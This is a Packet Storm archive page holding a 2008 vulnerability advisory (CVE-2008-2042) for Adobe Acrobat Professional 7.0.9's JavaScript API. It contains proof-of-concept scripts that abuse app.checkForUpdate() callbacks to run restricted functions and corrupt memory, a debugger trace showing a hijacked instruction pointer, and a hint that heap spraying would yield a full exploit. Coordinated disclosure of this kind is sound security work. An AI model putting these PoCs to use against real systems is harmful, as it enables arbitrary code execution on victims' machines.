exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

aap-bypass.txt

aap-bypass.txt
Posted May 7, 2008
Authored by cocoruder | Site ruder.cdut.net

Two critical vulnerabilities exist in the javascript API of Adobe Acrobat Professional 7. A remote attacker who successfully exploits these vulnerabilities can execute restricted functions and arbitrary codes on the affected system. Adobe Acrobat Professional version 7.0.9 is affected.

tags | advisory, remote, arbitrary, javascript, vulnerability, bypass
advisories | CVE-2008-2042
SHA-256 | 2439aa2322600b477cca7a6d1e36624932b620e1d197bf4f3031537110a4ef00

aap-bypass.txt

Change Mirror Download
Adobe Acrobat Professional Javascript For PDF Security Feature Bypass
and Memory Corruption Vulnerabilities

by cocoruder(frankruder_at_hotmail.com)
http://ruder.cdut.net


Summary:

Two critical vulnerabilities exist in the javascript API of Adobe
Acrobat Professional 7. A remote attacker who successfully exploits
these vulnerabilities can execute restricted functions and arbitrary
codes on the affected system.


Affected Software Versions:

Adobe Acrobat Professional 7.0.9



Details:

These two vulnerabilities specially exist in an unpublicized
fucntion called "app.checkForUpdate()", which are exploited through a
callback function.

Following is the POC for how to execute restricted functions:

function myCallBack()
{
app.alert("It will call app.newDoc()");
app.newDoc();
app.alert("function has been called");
}

app.checkForUpdate
({
cType:"AAAA",
cName:"BBBB",
oCallback:myCallBack,
cVer:"CCCC",
cMsg:"DDDD",
oParams:myCallBack
});


As we know, when we call "app.newDoc()" normally, the function can
not be executed because of the security feature of PDF's javascript,
but the above code can still execute this function successfully, other
restricted functions can also be executed by exploiting this
vulnerability.

The POC for triggering the memory corruption vulnerability:

function myCallBack()
{
app.alert("Corrupting the memory");

// Open a new report will corrupt the memory
var rep = new Report();

app.alert("If the application has not been crashed, try to close the
application and then you will get it.");
}

app.checkForUpdate
({
cType:"AAAA",
cName:"BBBB",
oCallback:myCallBack,
cVer:"CCCC",
cMsg:"DDDD",
oParams:myCallBack
});


When we call the function "new Report()"(other functions maybe
useful too) in the function "Callback", it will corrupt the memory.
Debug informations from Windbg as follows:

First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0946fb98 ebx=00000040 ecx=10101010 edx=0946fb90 esi=0946eaea edi=01c1dfbc
eip=10101010 esp=0012f6cc ebp=0012f77c iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
exlang32+0x101010:
10101010 001b add byte ptr [ebx],bl ds:0023:00000040=??
0:000> u eip
exlang32+0x101010:
10101010 001b add byte ptr [ebx],bl
10101012 6c ins byte ptr es:[edi],dx
10101013 0000 add byte ptr [eax],al
10101015 1b640000 sbb esp,dword ptr [eax+eax]
10101019 336000 xor esp,dword ptr [eax]
1010101c 0033 add byte ptr [ebx],dh
1010101e 60 pushad
1010101f 0000 add byte ptr [eax],al

It is running codes at an unexpected address.

Using the heap spray technology of javascript in PDF can develop a
working exploit for this vulnerability easily.

Note that because the special API does NOT exist in Adobe
Reader/Acrobat 8, as my test, the vulnerability does NOT affect Adobe
Reader/Acrobat 8.



Solution:

Adobe has released an advisory for this vulnerability which is available on:

http://www.adobe.com/support/security/bulletins/apsb08-13.html

Fortinet advisory can be found at:

http://www.fortiguardcenter.com



CVE Information:

CVE-2008-2042



Disclosure Timeline:

2007.11.01 Vendor notified via email
2007.11.02 Vendor responded
2008.05.06 Coordinated public disclosure



--EOF--
Login or Register to add favorites

File Archive:

November 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    16 Files
  • 2
    Nov 2nd
    17 Files
  • 3
    Nov 3rd
    17 Files
  • 4
    Nov 4th
    11 Files
  • 5
    Nov 5th
    0 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    3 Files
  • 8
    Nov 8th
    59 Files
  • 9
    Nov 9th
    12 Files
  • 10
    Nov 10th
    6 Files
  • 11
    Nov 11th
    11 Files
  • 12
    Nov 12th
    1 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    9 Files
  • 15
    Nov 15th
    33 Files
  • 16
    Nov 16th
    53 Files
  • 17
    Nov 17th
    11 Files
  • 18
    Nov 18th
    14 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    26 Files
  • 22
    Nov 22nd
    22 Files
  • 23
    Nov 23rd
    10 Files
  • 24
    Nov 24th
    9 Files
  • 25
    Nov 25th
    11 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    20 Files
  • 29
    Nov 29th
    9 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close